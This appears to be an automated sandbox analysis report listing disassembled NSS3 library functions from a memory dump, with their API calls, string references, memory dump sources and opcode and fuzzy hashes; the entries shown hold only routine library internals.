                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C74FE08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C74FE1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75116E
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C74FE29
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C74FE3D
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C74FE62
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?), ref: 6C74FE6F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 660648399-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b68e46d085947938ea8e422cc6698a3c83bc562be4be21ae82007d1a3579836d
                                                                                                                                                                                                                                                                                          • Instruction ID: b3f04130e8bb1d1393355a406999ec3449c426c2ca1ffd856485d54d27f497e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b68e46d085947938ea8e422cc6698a3c83bc562be4be21ae82007d1a3579836d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C91108B6A00215ABEB008F54DD44E5BB3DCAF5429EF14C038E91C87B12EB31D924CB91
                                                                                                                                                                                                                                                                                          Function 6C7FFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C7FFD9E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6E1A48), ref: 6C7B9BB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6E1A48), ref: 6C7B9BC8
                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6C7FFDB9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DA900: TlsGetValue.KERNEL32(00000000,?,6C8514E4,?,6C674DD9), ref: 6C6DA90F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6DA94F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C7FFDD4
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C7FFDF2
                                                                                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6C7FFE0D
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C7FFE23
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3365241057-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 962ab14fb66f88525805cb1d6bf8fee209d596b25e0ef4a9ac102becf83b3b5f
                                                                                                                                                                                                                                                                                          • Instruction ID: a24b3e5693f1bda8df316f6a2812fcd5c168374b9cd7421638ba4793855a2b42
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 962ab14fb66f88525805cb1d6bf8fee209d596b25e0ef4a9ac102becf83b3b5f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A01E1F6A002009BCF144F15FD048527772BB1223C71407B4E83647BE2EB62ED29C6C2
                                                                                                                                                                                                                                                                                          Function 6C6DAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DAFDA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C6DAF5C
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C6DAFD3
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6DAFC4
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C6DAFCE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                          • Opcode ID: 5b3a7efda98d7d86931c2baad3b7b4b8db5255ff5ebfefae84f92b63e4f25ce9
                                                                                                                                                                                                                                                                                          • Instruction ID: 44507336a7f7c2afbaea08839298c5d22a96e16c7e4586252e669f98cf0ca645
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3a7efda98d7d86931c2baad3b7b4b8db5255ff5ebfefae84f92b63e4f25ce9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3191E375B052158FDB14CF69C850BAAB7F1BF85314F1A45A8E864AB752C334FC01CBA9
                                                                                                                                                                                                                                                                                          Function 6C73FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C73FC55
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C73FCB2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C73FDB7
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C73FDDE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C748800: TlsGetValue.KERNEL32(?,6C75085A,00000000,?,6C6F8369,?), ref: 6C748821
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C748800: TlsGetValue.KERNEL32(?,?,6C75085A,00000000,?,6C6F8369,?), ref: 6C74883D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C748800: EnterCriticalSection.KERNEL32(?,?,?,6C75085A,00000000,?,6C6F8369,?), ref: 6C748856
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C748800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C748887
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C748800: PR_Unlock.NSS3(?,?,?,?,6C75085A,00000000,?,6C6F8369,?), ref: 6C748899
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                                          • String ID: pkcs11:
                                                                                                                                                                                                                                                                                          • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                                          • Opcode ID: d5b341dc62e1a2e673724ce7c1fa1d1229ae3f6122807cc5a79846b8ac797fd2
                                                                                                                                                                                                                                                                                          • Instruction ID: 49bcc595660176e185f26993be80cdf7802175a3b215853a465848431431e16f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5b341dc62e1a2e673724ce7c1fa1d1229ae3f6122807cc5a79846b8ac797fd2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 875103B2A502319BEB019F259F4DB6A3365AF4139CF1510B5DD0C9BB53EB34E804CB92
                                                                                                                                                                                                                                                                                          Function 6C67BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C67BE02
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7A9C40: memcmp.VCRUNTIME140(?,00000000,6C67C52B), ref: 6C7A9D53
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C67BE9F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C67BE98
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C67BE89
                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C67BE93
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 1135338897-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 9d65c054f51869cd03877adb7ea5fd48267113ac656f84322185b63bb7230948
                                                                                                                                                                                                                                                                                          • Instruction ID: 63173a8a4ee58e255226e327645d5b8fd1a4162aeac0d49ae6e57f166afd9178
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d65c054f51869cd03877adb7ea5fd48267113ac656f84322185b63bb7230948
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F315931B046569BC320CF68C8D8AEBBBA1AF81398B088D54EE541BB41D371EC06C3E4
                                                                                                                                                                                                                                                                                          Function 6C6F1EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C6F4C64,?,-00000004), ref: 6C6F1EE2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C6F1D97,?,?), ref: 6C751836
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F4C64,?,-00000004), ref: 6C6F1F13
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F4C64,?,-00000004), ref: 6C6F1F37
                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,dLol,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6F4C64,?,-00000004), ref: 6C6F1F53
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                                                                                          • String ID: dLol
                                                                                                                                                                                                                                                                                          • API String ID: 3216063065-1256296951
                                                                                                                                                                                                                                                                                          • Opcode ID: 0b76200e0ab20e9dc877b2101c30b9118cfea49a556de971dad0c7413d036ff6
                                                                                                                                                                                                                                                                                          • Instruction ID: 7efd84c95289f2f193934e28154e1cbac93d5d2064477edee52b604d618dd728
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b76200e0ab20e9dc877b2101c30b9118cfea49a556de971dad0c7413d036ff6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4021A7B1905305AFD710CF26DD04ADBB7EAAB85799F400929EC64C3A40F731E51AC7D2
                                                                                                                                                                                                                                                                                          Function 6C6E0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C6E0BDE), ref: 6C6E0DCB
                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C6E0BDE), ref: 6C6E0DEA
                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C6E0BDE), ref: 6C6E0DFC
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C6E0BDE), ref: 6C6E0E32
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C6E0E2D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                                                          • Opcode ID: f0b042c6c46d6869a7bd31f67781941644abaf5b10c9efd4d8cc9c96428dad7e
                                                                                                                                                                                                                                                                                          • Instruction ID: d91b9c14e3a5d075d6b5cc5a900bd5c3111794b6198242dc4a3633fd572c76ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0b042c6c46d6869a7bd31f67781941644abaf5b10c9efd4d8cc9c96428dad7e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE01F172B052109FE6209F68CC45E2773ACDB49B09B05483EE909D3A42EBA1EC19C7E1
                                                                                                                                                                                                                                                                                          Function 6C79AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]xl,00000000,?,?,6C776AC6,?), ref: 6C79AC2D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: TlsGetValue.KERNEL32(?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE10
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: EnterCriticalSection.KERNEL32(?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE24
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C71D079,00000000,00000001), ref: 6C73AE5A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE6F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE7F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: TlsGetValue.KERNEL32(?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AEB1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AEC9
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]xl,00000000,?,?,6C776AC6,?), ref: 6C79AC44
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]xl,00000000,?,?,6C776AC6,?), ref: 6C79AC59
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C776AC6,?,?,?,?,?,?,?,?,?,?,6C785D40,00000000,?,6C78AAD4), ref: 6C79AC62
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                          • String ID: @]xl
                                                                                                                                                                                                                                                                                          • API String ID: 1595327144-2111235151
                                                                                                                                                                                                                                                                                          • Opcode ID: b8d5750d52da7b6ac4be183b1f6e425d03e73dfbf0f97df4d22d87a46c102134
                                                                                                                                                                                                                                                                                          • Instruction ID: 33c8356785a84cd178f988f197cf72459dbd6dae2d0149245fcf67063a107038
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8d5750d52da7b6ac4be183b1f6e425d03e73dfbf0f97df4d22d87a46c102134
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D018BB5A016009FDF00DF14EAC9B5677A8AF05B2CF188078E9498F706D730E808CBA1
                                                                                                                                                                                                                                                                                          Function 6C689C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C689CF2
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C689D45
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C689D8B
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C689DDE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
